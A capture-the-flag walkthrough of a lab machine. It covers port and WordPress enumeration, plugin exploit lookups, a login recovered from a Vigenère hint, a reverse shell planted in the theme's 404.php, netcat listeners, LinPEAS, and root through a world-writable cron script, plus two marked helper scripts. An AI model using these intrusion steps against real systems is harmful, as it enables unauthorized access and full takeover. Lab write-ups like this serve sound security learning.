```
Nmap scan report for 10.10.20.32
Host is up (0.050s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.11.3.###
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 e2:5c:33:22:76:5c:93:66:cd:96:9c:16:6a:b3:17:a4 (RSA)
|   256 1b:6a:36:e1:8e:b4:96:5e:c6:ef:0d:91:37:58:59:b6 (ECDSA)
|_  256 fb:fa:db:ea:4e:ed:20:2b:91:18:9d:58:a0:6a:50:ec (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```
As we can see, there are 3 ports open: 21 FTP, 22 SSH, and 80 HTTP. The -A flag in our scan gave us a title for the HTTP page, and we can see it’s just the Apache2 default page. This means we should fire up gobuster to learn more about what may be lurking. First, though, anonymous FTP is allowed, so let’s have a look there.
```
~ ftp 10.10.20.32
Connected to 10.10.20.32.
220 (vsFTPd 3.0.3)
Name (10.10.20.32:m4iler): ftp
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -hal
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        115          4096 Oct 06 11:57 .
drwxr-xr-x    2 0        115          4096 Oct 06 11:57 ..
226 Directory send OK.
ftp> cd ..
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -hal
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        115          4096 Oct 06 11:57 .
drwxr-xr-x    2 0        115          4096 Oct 06 11:57 ..
226 Directory send OK.
```
That’s a bit disappointing, I thought the root.txt would be right in there. Welp, can’t be helped.
All righty! GoBuster shows us two different URLs: /wordpress and /hackathons. The WordPress site seems like a good find, let’s run wpscan against it!
```
WordPress Security Scanner by the WPScan Team
Version 3.8.11
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://10.10.20.32/wordpress/ [10.10.20.32]
[+] Started: Sun Feb  7 19:22:09 2021

[+] XML-RPC seems to be enabled: http://10.10.20.32/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] WordPress readme found: http://10.10.20.32/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://10.10.20.32/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://10.10.20.32/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.5.1 identified (Insecure, released on 2020-09-01).
 | Found By: Atom Generator (Aggressive Detection)
 |  - http://10.10.20.32/wordpress/index.php/feed/atom/, <generator uri="https://wordpress.org/" version="5.5.1">WordPress</generator>
 | Confirmed By: Style Etag (Aggressive Detection)
 |  - http://10.10.20.32/wordpress/wp-admin/load-styles.php, Match: '5.5.1'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] mail-masta
 | Location: http://10.10.20.32/wordpress/wp-content/plugins/mail-masta/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2014-09-19T07:52:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.0 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.10.20.32/wordpress/wp-content/plugins/mail-masta/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://10.10.20.32/wordpress/wp-content/plugins/mail-masta/readme.txt

[+] reflex-gallery
 | Location: http://10.10.20.32/wordpress/wp-content/plugins/reflex-gallery/
 | Latest Version: 3.1.7 (up to date)
 | Last Updated: 2019-05-10T16:05:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 3.1.7 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.10.20.32/wordpress/wp-content/plugins/reflex-gallery/readme.txt

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpscan.com/register

[+] Finished: Sun Feb  7 19:22:13 2021
[+] Requests Done: 32
[+] Cached Requests: 26
[+] Data Sent: 8.812 KB
[+] Data Received: 10.017 KB
[+] Memory used: 161.727 MB
[+] Elapsed time: 00:00:04
```
Well that’s a lot of text to churn through. Let’s focus on Mail Masta first.
Looking at searchsploit, we have 2 exploits for Mail Masta: an LFI and a SQL injection.
```
------------------------------------------------------------ ----------------------
 Exploit Title                                              | Path
------------------------------------------------------------ ----------------------
WordPress Plugin Mail Masta 1.0 - Local File Inclusion      | php/webapps/40290.txt
WordPress Plugin Mail Masta 1.0 - SQL Injection             | php/webapps/41438.txt
------------------------------------------------------------ ----------------------
Shellcodes: No Results
```
Okay, from the LFI exploit, we can read system data (but only data accessible to www-data, since that’s who we’re running the server as). This means I could read /etc/passwd, which gave me some information about the user elyana. The SQLi exploit gave us a table, but I couldn’t grab any data from it. Might come around to it later.
Okay, since we got SOME info from Mail Masta, let’s see if there’s any dirt on Reflex Gallery. Running searchsploit again gives us some ideas:
Okay, from the WPscan output we know this exploit is for 3.1.3 and the current version running is 3.1.7. No dice (and yes, I’ve tried it in msfconsole before typing this out, suuuuure). Let’s look elsewhere.
The Vinegar hackathon
There was one more directory we haven’t seen so far: /hackathons. Well, it may be of more help, eh?
Damn. There can’t just be this one sentence! If only there were something we could do to see if there is anything written on the site just to check if the box creator left us any clues!
In the source code of the website we find two lines. One with a jumble of text, the other with something that looks like a key.
The page says they hate vinegar. Well, I’m not fond of it either. Maybe it’s wordplay?
The Vigenère cipher
The Vigenère cipher remained unbroken for a total of 300 years. Now, we have the ciphertext and we’re not in the 18th century, so we should be able to crack it. The second line of the text can be tried as a deciphering key, and with that, we get a phrase saying Try #########. Tie that in with our username, and we have something we can put in a login box!
After putting this in, we get into the WordPress admin panel!
(NOTE: You can read more about Vigenère ciphers here.)
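The decryption step above, as an added example that is not part of the original writeup: a small Vigenère encrypt/decrypt routine. The keyword and sample text are constructed, since the real ciphertext and key from the /hackathons page source are not reproduced here; the key index advances only on letters, so spaces and punctuation pass through unchanged.

```python
import string

ALPHABET = string.ascii_uppercase


def _key_shifts(key):
    """Turn the keyword into a list of 0-25 shifts, ignoring non-letters."""
    shifts = [ALPHABET.index(c) for c in key.upper() if c in ALPHABET]
    if not shifts:
        raise ValueError("key must contain at least one letter")
    return shifts


def vigenere(text, key, decrypt=False):
    """Encrypt (or decrypt) `text` with the Vigenère cipher under `key`.

    Only ASCII letters are shifted; case is preserved, and the key position
    advances only on letters, so other characters are copied through as-is.
    """
    shifts = _key_shifts(key)
    out = []
    pos = 0
    for ch in text:
        if ch.isascii() and ch.isalpha():
            shift = shifts[pos % len(shifts)]
            if decrypt:
                shift = -shift
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base + shift) % 26 + base))
            pos += 1
        else:
            out.append(ch)
    return "".join(out)


def vigenere_encrypt(plaintext, key):
    return vigenere(plaintext, key)


def vigenere_decrypt(ciphertext, key):
    return vigenere(ciphertext, key, decrypt=True)


if __name__ == "__main__":
    # Constructed sample, not the box's real ciphertext or key.
    KEY = "vinegar"
    ct = vigenere_encrypt("Try this password!", KEY)
    print(ct)
    print(vigenere_decrypt(ct, KEY))
```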
From WordPress, we can do a lot. Blog about puppies and rainbows, let the world know of its impending doom… or just wreak havoc.
There are many ways to get where we want, but the one I chose was manually editing the 404.php template in the theme used. I simply replaced the theme’s 404.php with PentestMonkey’s reverse shell, edited the IP and port to match my netcat listener, and off to the races we go.
```
nc -lnvp 5050
listening on [any] 5050 ...
connect to [10.11.3.###] from (UNKNOWN) [10.10.20.32] 34002
Linux elyana 4.15.0-118-generic #119-Ubuntu SMP Tue Sep 8 12:30:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 19:28:10 up  1:26,  0 users,  load average: 0.04, 0.03, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
```
This is a very good starting point. We can’t read elyana’s user.txt file, not to speak of the root.txt, but we’ll get there. How? LinPEAS.
LinPEAS the helpful
Using LinPEAS is simple, yet very powerful. It runs a long list of enumeration commands and highlights the results that look exploitable, all in a single script that can be easily transferred via wget and a little Python magic (python3 -m http.server).
On the attacker:
```
cd tools
ls
linpeas.sh  php-reverse-shell.php
python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
```
On the server to be recon’d:
Now that we have the LinPEAS script, just chmod +x it, and run with ./linpeas.sh
```
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.

Linux Privesc Checklist: https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist
 LEGEND:
  RED/YELLOW: 99% a PE vector
  RED: You must take a look at it
  LightCyan: Users with console
  Blue: Users without console & mounted devs
  Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
  LightMangeta: Your username

====================================( Basic information )=====================================
OS: Linux version 4.15.0-118-generic (buildd@lgw01-amd64-039) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #119-Ubuntu SMP Tue Sep 8 12:30:01 UTC 2020
User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Hostname: elyana
Writable folder: /dev/shm
[+] /bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /bin/nc is available for network discover & port scanning (linpeas can discover hosts and scan ports, learn more with -h)

Caching directories . . . . . . . . . . . . . . . . . . . . . . . DONE

====================================( System Information )====================================
[+] Operative system
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#kernel-exploits
Linux version 4.15.0-118-generic (buildd@lgw01-amd64-039) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #119-Ubuntu SMP Tue Sep 8 12:30:01 UTC 2020
Distributor ID: Ubuntu
Description:    Ubuntu 18.04.5 LTS
Release:        18.04
Codename:       bionic

[+] Sudo version
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-version
Sudo version 1.8.21p2
```
**[SNIBBEDY SNIB]**
```
/etc/cron.weekly:
total 20
drwxr-xr-x  2 root root 4096 Aug  6  2020 .
drwxr-xr-x 98 root root 4096 Oct  9 08:38 ..
-rw-r--r--  1 root root  102 Nov 16  2017 .placeholder
-rwxr-xr-x  1 root root  723 Apr  7  2018 man-db
-rwxr-xr-x  1 root root  211 Nov 12  2018 update-notifier-common
```
I had to snibbedy snib part of the output (it really gives you a LOT), but I left in the one thing we found. A cron job running every minute as root. Let’s see what it’s about!
```
bash-4.4$ ls -hal /var/backups
ls -hal /var/backups
total 52K
drwxr-xr-x  2 root root 4.0K Oct  7 13:41 .
drwxr-xr-x 14 root root 4.0K Oct  5 19:43 ..
-rw-r--r--  1 root root  33K Oct  6 11:57 apt.extended_states.0
-rw-r--r--  1 root root 3.5K Oct  5 21:07 apt.extended_states.1.gz
-rwxrwxrwx  1 root root   79 Feb  7 19:46 script.sh
bash-4.4$
```
Oh lawdy! 777 permissions on a file run by root? Don’t mind if I do!
What’s the actual content?
```
bash-4.4$ cat script.sh
cat script.sh
#!/bin/bash

#Just a test script, might use it later to for a cron task
```
Well diddly darn it, there is nothing important in the file at the moment. The note also says it’s going to be used later. As an undocumented administrator, it will be an honor to help my fellow admins.
Replacing the empty script with a simple reverse shell (courtesy of PayloadsAllTheThings), we can turn an innocuous piece of code into a root reverse shell, bypassing the elyana user entirely.
Then, because the script runs every minute, we just have to start a netcat listener to capture our reverse shell.
```
nc -lnvp 4242
```
And, several seconds to a minute later, we get our shell back. W00T W00T!
```
nc -lnvp 4242
listening on [any] 4242 ...
connect to [10.11.3.###] from (UNKNOWN) [10.10.20.32] 37722
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
#
```
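The root shell above rests on a single misconfiguration: a root cron entry pointing at a world-writable script. As an added defender's check that is not part of the writeup, the Python below parses /etc/crontab-style lines and flags any absolute path in the command field that others can write to. The crontab text and the mode-777 script are constructed in a temporary directory to mirror /var/backups/script.sh.

```python
import os
import re
import stat
import tempfile

# /etc/crontab format: five schedule fields (or an @keyword), a user, then the command.
CRONTAB_LINE = re.compile(
    r"^\s*(?:@\w+|(?:\S+\s+){4}\S+)\s+(?P<user>\S+)\s+(?P<cmd>.+)$"
)


def world_writable(path):
    """True if `path` exists and has the other-write bit set (e.g. mode 777)."""
    try:
        st = os.stat(path)
    except OSError:
        return False
    return bool(st.st_mode & stat.S_IWOTH)


def risky_cron_targets(crontab_text):
    """Return (user, path) pairs for entries whose command references a world-writable
    absolute path. A root entry here lets any local user run code as root."""
    findings = []
    for line in crontab_text.splitlines():
        fields = line.split()
        # Skip blanks, comments and variable assignments such as SHELL=/bin/sh.
        if not fields or fields[0].startswith("#") or "=" in fields[0]:
            continue
        m = CRONTAB_LINE.match(line)
        if not m:
            continue
        for token in m.group("cmd").split():
            if token.startswith("/") and world_writable(token):
                findings.append((m.group("user"), token))
    return findings


def demo():
    """Constructed scenario mirroring the box: root runs a 777 script.sh every minute."""
    script = os.path.join(tempfile.mkdtemp(), "script.sh")
    with open(script, "w") as fh:
        fh.write("#!/bin/bash\n#Just a test script\n")
    os.chmod(script, 0o777)
    crontab = ("SHELL=/bin/sh\n# m h dom mon dow user command\n"
               f"* * * * * root {script}\n"
               "17 * * * * root cd / && run-parts --report /etc/cron.hourly\n")
    return risky_cron_targets(crontab)


if __name__ == "__main__":
    for user, path in demo():
        print(f"[!] cron entry for {user} runs world-writable {path}")
```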
This is labelled an easy box, said to have “multiple possible routes to root, both intentional and unintentional”. I have only found and documented one, but there may be more (seems to me that the FTP server should be another way in). However, the time being what it is (past my bedtime), I will not focus on all the routes in this writeup.
This box has shown me something that may be very useful in real-life pentests: the way may not always be straight ahead. The LFI exploit gave us a username, but no password. The /hackathons directory gave us a password, but no username. We went down several possible rabbit holes (not too deep ones, though), and needed to perform multiple recon passes in order to get something useful.
All in all, huge props to i7m4d for making this amazing box. I have to apologize for my attitude concerning this multi-route box, but it’s way too late for me to run through all of it again and again and again.